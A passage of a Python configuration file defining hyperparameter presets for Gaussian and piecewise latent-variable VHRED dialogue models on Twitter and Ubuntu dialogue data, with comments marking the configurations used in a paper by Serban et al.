        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
        'gate_latent_piecewise_per_utterance': False,
    })
    return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp8():
    """Twitter Gaussian+Piecewise VHRED cluster config (experiment 8).

    LSTM decoder, qdim_decoder=4000, sdim=1000; Gaussian and piecewise latent
    variables both enabled at dimension 300, with KL annealing and decoder
    token dropout, and the piecewise gating explicitly disabled.
    """
    state = prototype_state()
    # Fill your paths here!
    state.update({
        'train_dialogues': "../TwitterDataBPE/Train.dialogues.pkl",
        'test_dialogues': "../TwitterDataBPE/Test.dialogues.pkl",
        'valid_dialogues': "../TwitterDataBPE/Valid.dialogues.pkl",
        'dictionary': "../TwitterDataBPE/Dataset.dict.pkl",
        'save_dir': "Output",
        # Training / optimiser settings.
        'max_grad_steps': 80,
        'valid_freq': 2500,
        'prefix': "TwitterModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder / decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'decoder_bias_type': 'all',  # Choose between 'first', 'all' and 'selective'
        'direct_connection_between_encoders_and_decoder': True,
        'deep_direct_connection': False,
        'qdim_encoder': 1000,
        'qdim_decoder': 4000,
        'sdim': 1000,
        'rankdim': 400,
        'utterance_decoder_gating': 'LSTM',
        # Latent-variable configuration: Gaussian and piecewise both on
        # (dim 300), piecewise gating off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 300,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 300,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 60000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'patience': 20,
        'gate_latent_piecewise_per_utterance': False,
    })
    return state
###
### Ubuntu - Hyperparameter search for (Gaussian/Piecewise) VHRED on Ubuntu:
###
### sdim = 1000
### qdim_encoder = 1000
### qdim_decoder = 2000
### rankdim = 400
### deep_utterance_decoder_input={False,True}
###
###
### bidirectional_utterance_encoder = True
### reset_utterance_encoder_at_end_of_utterance = False
### reset_utterance_decoder_at_end_of_utterance = True
### lr = 0.0002
### bs = 80
### normop_type = 'LN'
###
### For latent models, we also experiment with kl_divergence_max_weight={0.25, 0.50, 0.75}
### NOTE: In this case, we early stop according to the reweighted lower bound!
###
###
# This is the Ubuntu HRED baseline used in "Piecewise Latent Variables for Neural Variational Text Processing" by Serban et al.
# It achieved best performance w.r.t. F1 activity performance on the validation set among all HRED baseline models
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Baseline_Exp1():
    """Ubuntu HRED baseline configuration (Exp1): both latent variables
    disabled, shallow utterance-decoder input.

    Per the note above, this is the HRED baseline from "Piecewise Latent
    Variables for Neural Variational Text Processing" (Serban et al.) with
    the best validation F1 activity score among the HRED baselines.
    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: baseline, so both disabled.
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': False,
        'patience': 20,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Baseline_Exp2():
    """Ubuntu HRED baseline configuration (Exp2): both latent variables
    disabled, deep utterance-decoder input enabled.

    Identical to Baseline_Exp1 except deep_utterance_decoder_input=True.
    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: baseline, so both disabled.
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp1():
    """Ubuntu G-VHRED configuration (Exp1): Gaussian latent variable only,
    shallow utterance-decoder input.

    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: Gaussian on, piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': False,
        'patience': 20,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp2():
    """Ubuntu P-VHRED configuration (Exp2): piecewise latent variable only,
    shallow utterance-decoder input.

    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: Gaussian off, piecewise on.
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': False,
        'patience': 20,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp3():
    """Ubuntu H-VHRED configuration (Exp3): both Gaussian and piecewise
    latent variables enabled, shallow utterance-decoder input.

    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: both latent variables on.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': False,
        'patience': 20,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp4():
    """Ubuntu G-VHRED configuration (Exp4): Gaussian latent variable only,
    deep utterance-decoder input enabled.

    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: Gaussian on, piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
# This is the Ubuntu P-VHRED model used in "Piecewise Latent Variables for Neural Variational Text Processing" by Serban et al.
# It achieved best performance w.r.t. F1 activity performance on the validation set among all P-VHRED models
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp5():
    """Ubuntu P-VHRED configuration (Exp5): piecewise latent variable only,
    deep utterance-decoder input enabled.

    Per the note above, this is the P-VHRED model from "Piecewise Latent
    Variables for Neural Variational Text Processing" (Serban et al.) with
    the best validation F1 activity score among the P-VHRED models.
    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: Gaussian off, piecewise on.
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp6():
    """Ubuntu H-VHRED configuration (Exp6): both Gaussian and piecewise
    latent variables enabled, deep utterance-decoder input enabled.

    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: both latent variables on.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
# This is the Ubuntu G-VHRED model used in "Piecewise Latent Variables for Neural Variational Text Processing" by Serban et al.
# It achieved best performance w.r.t. F1 activity performance on the validation set among all G-VHRED models
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp7():
    """Ubuntu G-VHRED configuration (Exp7): Gaussian latent variable only,
    deep utterance-decoder input, KL weight capped at 0.25.

    Per the note above, this is the G-VHRED model from "Piecewise Latent
    Variables for Neural Variational Text Processing" (Serban et al.) with
    the best validation F1 activity score among the G-VHRED models.
    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: Gaussian on, piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
        # Reweighted lower bound: cap the KL term weight at 0.25.
        'kl_divergence_max_weight': 0.25,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp8():
    """Ubuntu P-VHRED configuration (Exp8): piecewise latent variable only,
    deep utterance-decoder input, KL weight capped at 0.25.

    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: Gaussian off, piecewise on.
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
        # Reweighted lower bound: cap the KL term weight at 0.25.
        'kl_divergence_max_weight': 0.25,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
# This is the Ubuntu H-VHRED model used in "Piecewise Latent Variables for Neural Variational Text Processing" by Serban et al.
# It achieved best performance w.r.t. F1 activity performance on the validation set among all H-VHRED models
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp9():
    """Ubuntu H-VHRED configuration (Exp9): both Gaussian and piecewise
    latent variables enabled, deep utterance-decoder input, KL weight
    capped at 0.25.

    Per the note above, this is the H-VHRED model from "Piecewise Latent
    Variables for Neural Variational Text Processing" (Serban et al.) with
    the best validation F1 activity score among the H-VHRED models.
    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: both latent variables on.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
